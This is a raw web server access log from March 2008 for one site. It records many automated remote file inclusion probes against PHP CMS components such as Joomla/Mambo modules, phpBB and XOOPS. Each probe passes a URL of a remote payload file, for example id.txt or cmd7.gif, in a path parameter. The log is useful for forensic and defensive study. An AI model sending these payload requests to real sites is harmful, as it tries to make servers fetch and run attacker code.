89.17.201.147 - - [04/Mar/2008:08:18:54 -0800] "GET /logs/access_080119.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.17.201.147 - - [04/Mar/2008:08:18:55 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.17.201.147 - - [04/Mar/2008:08:18:55 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.59 - - [04/Mar/2008:08:18:58 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Mar/2008:08:18:59 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Mar/2008:08:18:59 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.38.160.137 - - [04/Mar/2008:08:19:09 -0800] "GET //skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:19:14 -0800] "GET /logs/access_071216.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:19:14 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:19:14 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:19:17 -0800] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:08:19:18 -0800] "GET /stringhttp://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:08:19:19 -0800] "GET /logs/stringhttp://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:08:19:22 -0800] "GET /stringhttp://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:08:19:22 -0800] "GET /logs/stringhttp://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:08:19:29 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:08:20:09 -0800] "GET /?phpbb_root_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.99.2.85 - - [04/Mar/2008:08:20:53 -0800] "GET /logs/access_080131.log/index2.php?x=http://ewo.sufx.net/electro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [04/Mar/2008:08:20:54 -0800] "GET /index2.php?x=http://ewo.sufx.net/electro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [04/Mar/2008:08:20:55 -0800] "GET /logs/index2.php?x=http://ewo.sufx.net/electro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:21:01 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:08:21:01 -0800] "GET /logs/?phpbb_root_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 200 37260 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:21:02 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:21:02 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:08:21:05 -0800] "GET //inc/cmses/aedating4CMS.php?bbPath[path]=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:21:30 -0800] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:21:35 -0800] "GET /logs/access_080131.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:08:21:36 -0800] "GET //inc/cmses/aedating4CMS.php?bbPath[path]=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:08:22:42 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:08:22:43 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
86.38.160.137 - - [04/Mar/2008:08:23:14 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:23:20 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:23:22 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.165.64 - - [04/Mar/2008:08:23:23 -0800] "GET /logs/access_080131.log/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.165.64 - - [04/Mar/2008:08:23:23 -0800] "GET /components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.165.64 - - [04/Mar/2008:08:23:24 -0800] "GET /logs/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:08:23:27 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:08:23:27 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:08:23:27 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:23:28 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.99.2.85 - - [04/Mar/2008:08:24:01 -0800] "GET /logs/access_080108.log/index2.php?x=http://ewo.sufx.net/electro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:24:02 -0800] "GET /logs/access_080207.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:24:15 -0800] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:24:15 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.58.165 - - [04/Mar/2008:08:24:25 -0800] "GET /logs/access_080117.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.21.165.64 - - [04/Mar/2008:08:25:05 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:25:08 -0800] "GET /logs/access_080118.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:08:25:46 -0800] "GET //account.php?action=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:08:25:46 -0800] "GET /logs//account.php?action=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:08:25:58 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:08:25:58 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:08:27:02 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:08:27:02 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
212.104.223.2 - - [04/Mar/2008:08:27:16 -0800] "GET /logs/access_080221.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [04/Mar/2008:08:27:17 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [04/Mar/2008:08:27:17 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:08:27:26 -0800] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:08:27:26 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:27:27 -0800] "GET /logs/access_080124.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:27:38 -0800] "GET /logs/access_080216.log//homepage.php?sel=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:27:38 -0800] "GET //homepage.php?sel=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.200 - - [04/Mar/2008:08:27:39 -0800] "GET / HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:27:42 -0800] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:27:43 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:27:43 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:27:48 -0800] "GET /logs//homepage.php?sel=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:27:58 -0800] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:27:58 -0800] "GET /convert/mvcw.php?vwar_root=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:27:58 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.104.223.2 - - [04/Mar/2008:08:27:59 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.225.91 - - [04/Mar/2008:08:28:06 -0800] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.225.91 - - [04/Mar/2008:08:28:07 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.225.91 - - [04/Mar/2008:08:28:07 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:08:28:26 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:08:28:26 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:08:28:29 -0800] "GET /logs/access_080119.log//account.php?action=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:08:28:31 -0800] "GET //account.php?action=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:08:28:31 -0800] "GET /logs//account.php?action=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:08:29:15 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:08:29:19 -0800] "GET /logs/access_080118.log//inc/cmses/aedating4CMS.php?bbPath[path]=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:08:29:20 -0800] "GET /logs//inc/cmses/aedating4CMS.php?bbPath[path]=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:08:29:22 -0800] "GET /logs/access_080211.log//account.php?action=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:08:29:33 -0800] "GET /logs/access_080124.log//inc/cmses/aedating4CMS.php?bbPath[path]=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.73 - - [04/Mar/2008:08:29:54 -0800] "GET /plans/ HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:30:11 -0800] "GET /logs/access_080108.log/convert/mvcw.php?step=1&vwar_root=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:30:18 -0800] "GET /logs/access_080122.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.71.11 - - [04/Mar/2008:08:30:25 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://hosturge.com/swf/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.181.25 - - [04/Mar/2008:08:30:38 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://la.gg/upl/xyx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
67.15.181.25 - - [04/Mar/2008:08:30:38 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://la.gg/upl/xyx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
211.233.7.68 - - [04/Mar/2008:08:30:40 -0800] "GET /config.inc.php?path_escape=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.233.7.68 - - [04/Mar/2008:08:30:40 -0800] "GET /logs/config.inc.php?path_escape=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:30:48 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:30:48 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:30:49 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:30:49 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:30:49 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.angelfire.com/linux/ryu1/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:30:50 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.angelfire.com/linux/ryu1/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
87.106.30.193 - - [04/Mar/2008:08:30:58 -0800] "GET /logs/index.php?option=com_wacartist&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
87.106.30.193 - - [04/Mar/2008:08:30:58 -0800] "GET /index.php?option=com_wacartist&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:08:32:22 -0800] "GET /logs/about.php??phpbb_root_path=%20phpbbhttp://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:08:32:22 -0800] "GET /about.php??phpbb_root_path=%20phpbbhttp://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
216.246.90.134 - - [04/Mar/2008:08:35:01 -0800] "GET /logs/access.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.90.134 - - [04/Mar/2008:08:35:01 -0800] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.90.134 - - [04/Mar/2008:08:35:01 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:35:21 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:35:21 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.225.91 - - [04/Mar/2008:08:35:24 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:08:35:34 -0800] "GET /logs/access_080118.log//inc/cmses/aedating4CMS.php?bbPath[path]=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:08:35:34 -0800] "GET /logs//inc/cmses/aedating4CMS.php?bbPath[path]=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
